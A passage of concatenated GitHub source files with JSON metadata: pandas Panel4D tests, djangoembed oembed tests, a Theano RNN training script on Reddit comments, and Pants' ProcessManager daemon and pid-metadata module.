self.assertFalse(result is self.panel4d)
# with filling
smaller_major = self.panel4d.major_axis[::5]
smaller = self.panel4d.reindex(major=smaller_major)
larger = smaller.reindex(major=self.panel4d.major_axis,
method='pad')
assert_panel_equal(larger.ix[:, :, self.panel4d.major_axis[1], :],
smaller.ix[:, :, smaller_major[0], :])
# don't necessarily copy
result = self.panel4d.reindex(
major=self.panel4d.major_axis, copy=False)
assert_panel4d_equal(result, self.panel4d)
self.assertTrue(result is self.panel4d)
def test_not_hashable(self):
p4D_empty = Panel4D()
self.assertRaises(TypeError, hash, p4D_empty)
self.assertRaises(TypeError, hash, self.panel4d)
def test_reindex_like(self):
# reindex_like
smaller = self.panel4d.reindex(labels=self.panel4d.labels[:-1],
items=self.panel4d.items[:-1],
major=self.panel4d.major_axis[:-1],
minor=self.panel4d.minor_axis[:-1])
smaller_like = self.panel4d.reindex_like(smaller)
assert_panel4d_equal(smaller, smaller_like)
def test_take(self):
raise nose.SkipTest("skipping for now")
# # axis == 0
# result = self.panel.take([2, 0, 1], axis=0)
# expected = self.panel.reindex(items=['ItemC', 'ItemA', 'ItemB'])
# assert_panel_equal(result, expected)
# # axis >= 1
# result = self.panel.take([3, 0, 1, 2], axis=2)
# expected = self.panel.reindex(minor=['D', 'A', 'B', 'C'])
# assert_panel_equal(result, expected)
# self.assertRaises(Exception, self.panel.take, [3, -1, 1, 2], axis=2)
# self.assertRaises(Exception, self.panel.take, [4, 0, 1, 2], axis=2)
def test_sort_index(self):
import random
rlabels = list(self.panel4d.labels)
ritems = list(self.panel4d.items)
rmajor = list(self.panel4d.major_axis)
rminor = list(self.panel4d.minor_axis)
random.shuffle(rlabels)
random.shuffle(ritems)
random.shuffle(rmajor)
random.shuffle(rminor)
random_order = self.panel4d.reindex(labels=rlabels)
sorted_panel4d = random_order.sort_index(axis=0)
assert_panel4d_equal(sorted_panel4d, self.panel4d)
# descending
# random_order = self.panel.reindex(items=ritems)
# sorted_panel = random_order.sort_index(axis=0, ascending=False)
# assert_panel_equal(sorted_panel,
# self.panel.reindex(items=self.panel.items[::-1]))
# random_order = self.panel.reindex(major=rmajor)
# sorted_panel = random_order.sort_index(axis=1)
# assert_panel_equal(sorted_panel, self.panel)
# random_order = self.panel.reindex(minor=rminor)
# sorted_panel = random_order.sort_index(axis=2)
# assert_panel_equal(sorted_panel, self.panel)
def test_fillna(self):
self.assertFalse(np.isfinite(self.panel4d.values).all())
filled = self.panel4d.fillna(0)
self.assertTrue(np.isfinite(filled.values).all())
self.assertRaises(NotImplementedError, self.panel4d.fillna, method='pad')
def test_swapaxes(self):
result = self.panel4d.swapaxes('labels', 'items')
self.assertIs(result.items, self.panel4d.labels)
result = self.panel4d.swapaxes('labels', 'minor')
self.assertIs(result.labels, self.panel4d.minor_axis)
result = self.panel4d.swapaxes('items', 'minor')
self.assertIs(result.items, self.panel4d.minor_axis)
result = self.panel4d.swapaxes('items', 'major')
self.assertIs(result.items, self.panel4d.major_axis)
result = self.panel4d.swapaxes('major', 'minor')
self.assertIs(result.major_axis, self.panel4d.minor_axis)
# this should also work
result = self.panel4d.swapaxes(0, 1)
self.assertIs(result.labels, self.panel4d.items)
# this works, but return a copy
result = self.panel4d.swapaxes('items', 'items')
assert_panel4d_equal(self.panel4d, result)
self.assertNotEqual(id(self.panel4d), id(result))
def test_to_frame(self):
raise nose.SkipTest("skipping for now")
# # filtered
# filtered = self.panel.to_frame()
# expected = self.panel.to_frame().dropna(how='any')
# assert_frame_equal(filtered, expected)
# # unfiltered
# unfiltered = self.panel.to_frame(filter_observations=False)
# assert_panel_equal(unfiltered.to_panel(), self.panel)
# # names
# self.assertEqual(unfiltered.index.names, ('major', 'minor'))
def test_to_frame_mixed(self):
raise nose.SkipTest("skipping for now")
# panel = self.panel.fillna(0)
# panel['str'] = 'foo'
# panel['bool'] = panel['ItemA'] > 0
# lp = panel.to_frame()
# wp = lp.to_panel()
# self.assertEqual(wp['bool'].values.dtype, np.bool_)
# assert_frame_equal(wp['bool'], panel['bool'])
def test_update(self):
p4d = Panel4D([[[[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]],
[[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]]]])
other = Panel4D([[[[3.6, 2., np.nan]],
[[np.nan, np.nan, 7]]]])
p4d.update(other)
expected = Panel4D([[[[3.6, 2, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]],
[[1.5, np.nan, 7],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.],
[1.5, np.nan, 3.]]]])
assert_panel4d_equal(p4d, expected)
def test_filter(self):
raise nose.SkipTest("skipping for now")
def test_apply(self):
raise nose.SkipTest("skipping for now")
def test_dtypes(self):
result = self.panel4d.dtypes
expected = Series(np.dtype('float64'), index=self.panel4d.labels)
assert_series_equal(result, expected)
def test_compound(self):
raise nose.SkipTest("skipping for now")
# compounded = self.panel.compound()
# assert_series_equal(compounded['ItemA'],
# (1 + self.panel['ItemA']).product(0) - 1)
def test_shift(self):
raise nose.SkipTest("skipping for now")
# # major
# idx = self.panel.major_axis[0]
# idx_lag = self.panel.major_axis[1]
# shifted = self.panel.shift(1)
# assert_frame_equal(self.panel.major_xs(idx),
# shifted.major_xs(idx_lag))
# # minor
# idx = self.panel.minor_axis[0]
# idx_lag = self.panel.minor_axis[1]
# shifted = self.panel.shift(1, axis='minor')
# assert_frame_equal(self.panel.minor_xs(idx),
# shifted.minor_xs(idx_lag))
# self.assertRaises(Exception, self.panel.shift, 1, axis='items')
def test_multiindex_get(self):
raise nose.SkipTest("skipping for now")
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1), ('b',2)],
# names=['first', 'second'])
# wp = Panel(np.random.random((4,5,5)),
# items=ind,
# major_axis=np.arange(5),
# minor_axis=np.arange(5))
# f1 = wp['a']
# f2 = wp.ix['a']
# assert_panel_equal(f1, f2)
# self.assertTrue((f1.items == [1, 2]).all())
# self.assertTrue((f2.items == [1, 2]).all())
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
# names=['first', 'second'])
def test_multiindex_blocks(self):
raise nose.SkipTest("skipping for now")
# ind = MultiIndex.from_tuples([('a', 1), ('a', 2), ('b', 1)],
# names=['first', 'second'])
# wp = Panel(self.panel._data)
# wp.items = ind
# f1 = wp['a']
# self.assertTrue((f1.items == [1, 2]).all())
# f1 = wp[('b',1)]
# self.assertTrue((f1.columns == ['A', 'B', 'C', 'D']).all())
def test_repr_empty(self):
empty = Panel4D()
repr(empty)
def test_rename(self):
mapper = {
'l1': 'foo',
'l2': 'bar',
'l3': 'baz'
}
renamed = self.panel4d.rename_axis(mapper, axis=0)
exp = Index(['foo', 'bar', 'baz'])
self.assertTrue(renamed.labels.equals(exp))
renamed = self.panel4d.rename_axis(str.lower, axis=3)
exp = Index(['a', 'b', 'c', 'd'])
self.assertTrue(renamed.minor_axis.equals(exp))
# don't copy
renamed_nocopy = self.panel4d.rename_axis(mapper, axis=0, copy=False)
renamed_nocopy['foo'] = 3.
self.assertTrue((self.panel4d['l1'].values == 3).all())
def test_get_attr(self):
assert_panel_equal(self.panel4d['l1'], self.panel4d.l1)
def test_from_frame_level1_unsorted(self):
raise nose.SkipTest("skipping for now")
def test_to_excel(self):
raise nose.SkipTest("skipping for now")
if __name__ == '__main__':
import nose
nose.runmodule(argv=[__file__, '-vvs', '-x', '--pdb', '--pdb-failure'],
exit=False)
| {
"content_hash": "ba1a386a95be471943e4f07a534df68f",
"timestamp": "",
"source": "github",
"line_count": 1103,
"max_line_length": 120,
"avg_line_length": 35.034451495920216,
"alnum_prop": 0.5613177030768832,
"repo_name": "stevenzhang18/Indeed-Flask",
"id": "3772d4b9c272bebaf7593a7b0503624d407e60bf",
"size": "38667",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "lib/pandas/tests/test_panel4d.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "45061"
},
{
"name": "HTML",
"bytes": "1386611"
},
{
"name": "JavaScript",
"bytes": "84693"
},
{
"name": "Python",
"bytes": "10498302"
}
],
"symlink_target": ""
} |
import oembed
import simplejson
from oembed.exceptions import AlreadyRegistered, NotRegistered, OEmbedMissingEndpoint
from oembed.models import StoredProvider, StoredOEmbed
from oembed.resources import OEmbedResource
from oembed.tests.oembed_providers import BlogProvider
from oembed.tests.tests.base import BaseOEmbedTestCase
class ProviderSiteTestCase(BaseOEmbedTestCase):
def test_register(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(NotRegistered, oembed.site.unregister, BlogProvider)
oembed.site.register(BlogProvider)
self.assertRaises(AlreadyRegistered, oembed.site.register, BlogProvider)
def test_get_provider(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(OEmbedMissingEndpoint, oembed.site.provider_for_url, self.blog_url)
oembed.site.register(BlogProvider)
provider = oembed.site.provider_for_url(self.blog_url)
self.assertTrue(isinstance(provider, BlogProvider))
def test_embed(self):
oembed.site.unregister(BlogProvider)
self.assertRaises(OEmbedMissingEndpoint, oembed.site.embed, self.blog_url)
oembed.site.register(BlogProvider)
resource = oembed.site.embed(self.blog_url)
self.assertTrue(isinstance(resource, OEmbedResource))
def test_object_caching(self):
StoredOEmbed.objects.all().delete()
for i in range(3):
resource = oembed.site.embed(self.blog_url)
self.assertEqual(StoredOEmbed.objects.count(), 1)
for i in range(3):
resource = oembed.site.embed(self.blog_url, maxwidth=400, maxheight=400)
self.assertEqual(StoredOEmbed.objects.count(), 2)
for i in range(3):
resource = oembed.site.embed(self.blog_url, maxwidth=400)
self.assertEqual(StoredOEmbed.objects.count(), 3)
def test_autodiscovery(self):
resp = self.client.get('/oembed/')
json = simplejson.loads(resp.content)
providers = oembed.site.store_providers(json)
self.assertEqual(len(providers), 3)
blog_provider, category_provider, rich_provider = providers
self.assertEqual(blog_provider.wildcard_regex, 'http://example.com/testapp/blog/*/*/*/*/')
self.assertEqual(blog_provider.regex, 'http://example.com/testapp/blog/.+?/.+?/.+?/.+?/')
self.assertEqual(blog_provider.resource_type, 'link')
self.assertEqual(blog_provider.endpoint_url, 'http://example.com/oembed/json/')
self.assertEqual(category_provider.wildcard_regex, 'http://example.com/testapp/category/*/')
self.assertEqual(category_provider.regex, 'http://example.com/testapp/category/.+?/')
self.assertEqual(category_provider.resource_type, 'photo')
self.assertEqual(category_provider.endpoint_url, 'http://example.com/oembed/json/')
self.assertEqual(rich_provider.wildcard_regex, 'http://example.com/testapp/rich/*/')
self.assertEqual(rich_provider.regex, 'http://example.com/testapp/rich/.+?/')
self.assertEqual(rich_provider.resource_type, 'rich')
self.assertEqual(rich_provider.endpoint_url, 'http://example.com/oembed/json/')
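# Note on the assertions above: autodiscovery translates each '*' in a
# provider's wildcard URL into the non-greedy '.+?' of the stored regex.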
| {
"content_hash": "b5ddcc37677e627f460c7fcce4975ff2",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 100,
"avg_line_length": 45.31506849315068,
"alnum_prop": 0.6774486094316807,
"repo_name": "ericholscher/djangoembed",
"id": "8529acb2c91852ba5c83e70d769929db6b22d039",
"size": "3308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oembed/tests/tests/sites.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "49353"
},
{
"name": "Python",
"bytes": "129032"
}
],
"symlink_target": ""
} |
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn import RNNTheano
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
# use a name that doesn't shadow the `time` module imported above
timestamp = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (timestamp, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model parameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, timestamp), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
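# Note on the annealing above: the learning rate is halved whenever the
# evaluated loss increases between checkpoints, e.g. 0.005 -> 0.0025 -> ...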
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
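# X_train/y_train are index sequences offset by one token; e.g. for
# "SENTENCE_START what are ... SENTENCE_END" (indices illustrative):
#   x: [0, 51, 27, ...]   # every token except the last
#   y: [51, 27, ..., 1]   # every token except the first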
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE != None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE) | {
"content_hash": "d99110386d9b3d56360932b3e489c492",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 124,
"avg_line_length": 42.043010752688176,
"alnum_prop": 0.6741687979539642,
"repo_name": "khuongnn/NERRNN",
"id": "9f794a922debe9b908caf8b95ad06e26678b82a5",
"size": "3934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "train (khuongnn-desktop's conflicted copy 2017-01-11).py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "56515"
},
{
"name": "Python",
"bytes": "29194"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import logging
import os
import signal
import time
import traceback
from contextlib import contextmanager
import psutil
from pants.base.build_environment import get_buildroot
from pants.init.subprocess import Subprocess
from pants.util.dirutil import read_file, rm_rf, safe_file_dump, safe_mkdir
from pants.util.process_handler import subprocess
logger = logging.getLogger(__name__)
@contextmanager
def swallow_psutil_exceptions():
"""A contextmanager that swallows standard psutil access exceptions."""
try:
yield
except (psutil.AccessDenied, psutil.NoSuchProcess):
# This masks common, but usually benign psutil process access exceptions that might be seen
# when accessing attributes/methods on psutil.Process objects.
pass
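# Hedged usage sketch: wrap any psutil attribute access that can race with
# process death, e.g.
#   with swallow_psutil_exceptions():
#       name = proc.name()  # simply skipped if proc exited in the meantime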
class ProcessGroup(object):
"""Wraps a logical group of processes and provides convenient access to ProcessManager objects."""
def __init__(self, name, metadata_base_dir=None):
self._name = name
self._metadata_base_dir = metadata_base_dir
def _instance_from_process(self, process):
"""Default converter from psutil.Process to process instance classes for subclassing."""
return ProcessManager(name=process.name(),
pid=process.pid,
process_name=process.name(),
metadata_base_dir=self._metadata_base_dir)
def iter_processes(self, proc_filter=None):
"""Yields processes from psutil.process_iter with an optional filter and swallows psutil errors.
If a psutil exception is raised during execution of the filter, that process will not be
yielded but subsequent processes will. On the other hand, if psutil.process_iter raises
an exception, no more processes will be yielded.
"""
with swallow_psutil_exceptions(): # process_iter may raise
for proc in psutil.process_iter():
with swallow_psutil_exceptions(): # proc_filter may raise
if (proc_filter is None) or proc_filter(proc):
yield proc
def iter_instances(self, *args, **kwargs):
for item in self.iter_processes(*args, **kwargs):
yield self._instance_from_process(item)
class ProcessMetadataManager(object):
""""Manages contextual, on-disk process metadata."""
class MetadataError(Exception): pass
class Timeout(Exception): pass
FILE_WAIT_SEC = 10
WAIT_INTERVAL_SEC = .1
def __init__(self, metadata_base_dir=None):
"""
:param str metadata_base_dir: The base directory for process metadata.
"""
super(ProcessMetadataManager, self).__init__()
self._metadata_base_dir = (
metadata_base_dir or
Subprocess.Factory.global_instance().create().get_subprocess_dir()
)
@staticmethod
def _maybe_cast(item, caster):
"""Given a casting function, attempt to cast to that type while masking common cast exceptions.
N.B. This is mostly suitable for casting string types to numeric types - e.g. a port number
read from disk into an int.
:param func caster: A casting callable (e.g. `int`).
:returns: The result of caster(item) or item if TypeError or ValueError are raised during cast.
"""
try:
return caster(item)
except (TypeError, ValueError):
# N.B. the TypeError catch here (already) protects against the case that caster is None.
return item
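# Example (hypothetical values): _maybe_cast('1729', int) -> 1729, while
# _maybe_cast('not-a-port', int) returns the string unchanged.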
@classmethod
def _deadline_until(cls, closure, timeout, wait_interval=WAIT_INTERVAL_SEC):
"""Execute a function/closure repeatedly until a True condition or timeout is met.
:param func closure: the function/closure to execute (should not block for long periods of time
and must return True on success).
:param float timeout: the maximum amount of time to wait for a true result from the closure in
seconds. N.B. this is timing based, so won't be exact if the runtime of
the closure exceeds the timeout.
:param float wait_interval: the amount of time to sleep between closure invocations.
:raises: :class:`ProcessManager.Timeout` on execution timeout.
"""
deadline = time.time() + timeout
while 1:
if closure():
return True
elif time.time() > deadline:
raise cls.Timeout('exceeded timeout of {} seconds for {}'.format(timeout, closure))
elif wait_interval:
time.sleep(wait_interval)
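# Hedged usage sketch: _deadline_until(lambda: os.path.exists(p), 5.0) polls
# every WAIT_INTERVAL_SEC and raises Timeout after ~5 seconds without success.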
@classmethod
def _wait_for_file(cls, filename, timeout=FILE_WAIT_SEC, want_content=True):
"""Wait up to timeout seconds for filename to appear with a non-zero size or raise Timeout()."""
def file_waiter():
return os.path.exists(filename) and (not want_content or os.path.getsize(filename))
try:
return cls._deadline_until(file_waiter, timeout)
except cls.Timeout:
# Re-raise with a more helpful exception message.
raise cls.Timeout('exceeded timeout of {} seconds while waiting for file {} to appear'
.format(timeout, filename))
def _get_metadata_dir_by_name(self, name):
"""Retrieve the metadata dir by name.
This should always live outside of the workdir to survive a clean-all.
"""
return os.path.join(self._metadata_base_dir, name)
def _maybe_init_metadata_dir_by_name(self, name):
"""Initialize the metadata directory for a named identity if it doesn't exist."""
safe_mkdir(self._get_metadata_dir_by_name(name))
def read_metadata_by_name(self, name, metadata_key, caster=None):
"""Read process metadata using a named identity.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param func caster: A casting callable to apply to the read value (e.g. `int`).
"""
try:
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
return self._maybe_cast(read_file(file_path).strip(), caster)
except (IOError, OSError):
return None
def write_metadata_by_name(self, name, metadata_key, metadata_value):
"""Write process metadata using a named identity.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param string metadata_value: The metadata value (e.g. '1729').
"""
self._maybe_init_metadata_dir_by_name(name)
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
safe_file_dump(file_path, metadata_value)
def await_metadata_by_name(self, name, metadata_key, timeout, caster=None):
"""Block up to a timeout for process metadata to arrive on disk.
:param string name: The ProcessMetadataManager identity/name (e.g. 'pantsd').
:param string metadata_key: The metadata key (e.g. 'pid').
:param int timeout: The deadline to write metadata.
:param type caster: A type-casting callable to apply to the read value (e.g. int, str).
:returns: The value of the metadata key (read from disk post-write).
:raises: :class:`ProcessMetadataManager.Timeout` on timeout.
"""
file_path = os.path.join(self._get_metadata_dir_by_name(name), metadata_key)
self._wait_for_file(file_path, timeout=timeout)
return self.read_metadata_by_name(name, metadata_key, caster)
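# Round-trip sketch (values hypothetical): a daemon writes
#   mgr.write_metadata_by_name('pantsd', 'pid', '1729')
# and a client blocks until it lands with
#   mgr.await_metadata_by_name('pantsd', 'pid', timeout=10, caster=int)  # -> 1729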
def purge_metadata_by_name(self, name):
"""Purge a processes metadata directory.
:raises: `ProcessManager.MetadataError` when OSError is encountered on metadata dir removal.
"""
meta_dir = self._get_metadata_dir_by_name(name)
logger.debug('purging metadata directory: {}'.format(meta_dir))
try:
rm_rf(meta_dir)
except OSError as e:
raise self.MetadataError('failed to purge metadata directory {}: {!r}'.format(meta_dir, e))
class ProcessManager(ProcessMetadataManager):
"""Subprocess/daemon management mixin/superclass. Not intended to be thread-safe."""
class InvalidCommandOutput(Exception): pass
class NonResponsiveProcess(Exception): pass
class ExecutionError(Exception):
def __init__(self, message, output=None):
super(ProcessManager.ExecutionError, self).__init__(message)
self.message = message
self.output = output
def __repr__(self):
return '{}(message={!r}, output={!r})'.format(type(self).__name__, self.message, self.output)
KILL_WAIT_SEC = 5
KILL_CHAIN = (signal.SIGTERM, signal.SIGKILL)
def __init__(self, name, pid=None, socket=None, process_name=None, socket_type=int,
metadata_base_dir=None):
"""
:param string name: The process identity/name (e.g. 'pantsd' or 'ng_Zinc').
:param int pid: The process pid. Overrides fetching of the self.pid @property.
:param string socket: The socket metadata. Overrides fetching of the self.socket @property.
:param string process_name: The process name for cmdline executable name matching.
:param type socket_type: The type to be used for socket type casting (e.g. int).
:param str metadata_base_dir: The overridden base directory for process metadata.
"""
super(ProcessManager, self).__init__(metadata_base_dir)
self._name = name
self._pid = pid
self._socket = socket
self._socket_type = socket_type
self._process_name = process_name
self._buildroot = get_buildroot()
self._process = None
@property
def name(self):
"""The logical name/label of the process."""
return self._name
@property
def process_name(self):
"""The logical process name. If defined, this is compared to exe_name for stale pid checking."""
return self._process_name
@property
def cmdline(self):
"""The process commandline. e.g. ['/usr/bin/python2.7', 'pants.pex'].
:returns: The command line or else `None` if the underlying process has died.
"""
with swallow_psutil_exceptions():
process = self._as_process()
if process:
return process.cmdline()
return None
@property
def cmd(self):
"""The first element of the process commandline e.g. '/usr/bin/python2.7'.
:returns: The first element of the process command line or else `None` if the underlying
process has died.
"""
return (self.cmdline or [None])[0]
@property
def pid(self):
"""The running processes pid (or None)."""
return self._pid or self.read_metadata_by_name(self._name, 'pid', int)
@property
def socket(self):
"""The running processes socket/port information (or None)."""
return self._socket or self.read_metadata_by_name(self._name, 'socket', self._socket_type)
@classmethod
def get_subprocess_output(cls, command, ignore_stderr=True, **kwargs):
"""Get the output of an executed command.
:param command: An iterable representing the command to execute (e.g. ['ls', '-al']).
:param ignore_stderr: Whether or not to ignore stderr output vs interleave it with stdout.
:raises: `ProcessManager.ExecutionError` on `OSError` or `CalledProcessError`.
:returns: The output of the command.
"""
if ignore_stderr is False:
kwargs.setdefault('stderr', subprocess.STDOUT)
try:
return subprocess.check_output(command, **kwargs)
except (OSError, subprocess.CalledProcessError) as e:
subprocess_output = getattr(e, 'output', '').strip()
raise cls.ExecutionError(str(e), subprocess_output)
def await_pid(self, timeout):
"""Wait up to a given timeout for a process to write pid metadata."""
return self.await_metadata_by_name(self._name, 'pid', timeout, int)
def await_socket(self, timeout):
"""Wait up to a given timeout for a process to write socket info."""
return self.await_metadata_by_name(self._name, 'socket', timeout, self._socket_type)
def write_pid(self, pid=None):
"""Write the current processes PID to the pidfile location"""
pid = pid or os.getpid()
self.write_metadata_by_name(self._name, 'pid', str(pid))
def write_socket(self, socket_info):
"""Write the local processes socket information (TCP port or UNIX socket)."""
self.write_metadata_by_name(self._name, 'socket', str(socket_info))
def write_named_socket(self, socket_name, socket_info):
"""A multi-tenant, named alternative to ProcessManager.write_socket()."""
self.write_metadata_by_name(self._name, 'socket_{}'.format(socket_name), str(socket_info))
def read_named_socket(self, socket_name, socket_type):
"""A multi-tenant, named alternative to ProcessManager.socket."""
return self.read_metadata_by_name(self._name, 'socket_{}'.format(socket_name), socket_type)
def _as_process(self):
"""Returns a psutil `Process` object wrapping our pid.
NB: Even with a process object in hand, subsequent method calls against it can always raise
`NoSuchProcess`. Care is needed to document the raises in the public API or else trap them and
do something sensible for the API.
:returns: a psutil Process object or else None if we have no pid.
:rtype: :class:`psutil.Process`
:raises: :class:`psutil.NoSuchProcess` if the process identified by our pid has died.
"""
if self._process is None and self.pid:
self._process = psutil.Process(self.pid)
return self._process
def is_dead(self):
"""Return a boolean indicating whether the process is dead or not."""
return not self.is_alive()
def is_alive(self, extended_check=None):
"""Return a boolean indicating whether the process is running or not.
:param func extended_check: An additional callable that will be invoked to perform an extended
liveness check. This callable should take a single argument of a
`psutil.Process` instance representing the context-local process
and return a boolean True/False to indicate alive vs not alive.
"""
try:
process = self._as_process()
return not (
# Can happen if we don't find our pid.
(not process) or
# Check for walkers.
(process.status() == psutil.STATUS_ZOMBIE) or
# Check for stale pids.
(self.process_name and self.process_name != process.name()) or
# Extended checking.
(extended_check and not extended_check(process))
)
except (psutil.NoSuchProcess, psutil.AccessDenied):
# On some platforms, accessing attributes of a zombie'd Process results in NoSuchProcess.
return False
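# Hedged example of an extended liveness check - verify the command line still
# looks like ours before trusting a possibly recycled pid:
#   pm.is_alive(extended_check=lambda p: 'pantsd' in ' '.join(p.cmdline()))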
def purge_metadata(self, force=False):
"""Instance-based version of ProcessMetadataManager.purge_metadata_by_name() that checks
for process liveness before purging metadata.
:param bool force: If True, skip process liveness check before purging metadata.
:raises: `ProcessManager.MetadataError` when OSError is encountered on metadata dir removal.
"""
if not force and self.is_alive():
raise self.MetadataError('cannot purge metadata for a running process!')
super(ProcessManager, self).purge_metadata_by_name(self._name)
def _kill(self, kill_sig):
"""Send a signal to the current process."""
if self.pid:
os.kill(self.pid, kill_sig)
def terminate(self, signal_chain=KILL_CHAIN, kill_wait=KILL_WAIT_SEC, purge=True):
"""Ensure a process is terminated by sending a chain of kill signals (SIGTERM, SIGKILL)."""
alive = self.is_alive()
if alive:
logger.debug('terminating {}'.format(self._name))
for signal_type in signal_chain:
pid = self.pid
try:
logger.debug('sending signal {} to pid {}'.format(signal_type, pid))
self._kill(signal_type)
except OSError as e:
logger.warning('caught OSError({e!s}) during attempt to kill -{signal} {pid}!'
.format(e=e, signal=signal_type, pid=pid))
# Wait up to kill_wait seconds to terminate or move onto the next signal.
try:
if self._deadline_until(self.is_dead, kill_wait):
alive = False
logger.debug('successfully terminated pid {}'.format(pid))
break
except self.Timeout:
# Loop to the next kill signal on timeout.
pass
if alive:
raise self.NonResponsiveProcess('failed to kill pid {pid} with signals {chain}'
.format(pid=self.pid, chain=signal_chain))
if purge:
self.purge_metadata(force=True)
def daemonize(self, pre_fork_opts=None, post_fork_parent_opts=None, post_fork_child_opts=None,
write_pid=True):
"""Perform a double-fork, execute callbacks and write the child pid file.
The double-fork here is necessary to truly daemonize the subprocess such that it can never
take control of a tty. The initial fork and setsid() creates a new, isolated process group
and also makes the first child a session leader (which can still acquire a tty). By forking a
second time, we ensure that the second child can never acquire a controlling terminal because
it's no longer a session leader - but it now has its own separate process group.
Additionally, a normal daemon implementation would typically perform an os.umask(0) to reset
the processes file mode creation mask post-fork. We do not do this here (and in daemon_spawn
below) due to the fact that the daemons that pants would run are typically personal user
daemons. Having a disparate umask from pre-vs-post fork causes files written in each phase to
differ in their permissions without good reason - in this case, we want to inherit the umask.
"""
self.purge_metadata()
self.pre_fork(**pre_fork_opts or {})
logger.debug('forking %s', self)
pid = os.fork()
if pid == 0:
os.setsid()
second_pid = os.fork()
if second_pid == 0:
try:
os.chdir(self._buildroot)
self.post_fork_child(**post_fork_child_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
try:
if write_pid: self.write_pid(second_pid)
self.post_fork_parent(**post_fork_parent_opts or {})
except Exception:
logger.critical(traceback.format_exc())
finally:
os._exit(0)
else:
# This prevents un-reaped, throw-away parent processes from lingering in the process table.
os.waitpid(pid, 0)
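# Minimal subclass sketch (hypothetical names): override the fork callbacks
# and call daemonize() to detach a long-running child:
#   class MyDaemon(ProcessManager):
#       def post_fork_child(self):
#           serve_forever()  # hypothetical entry point
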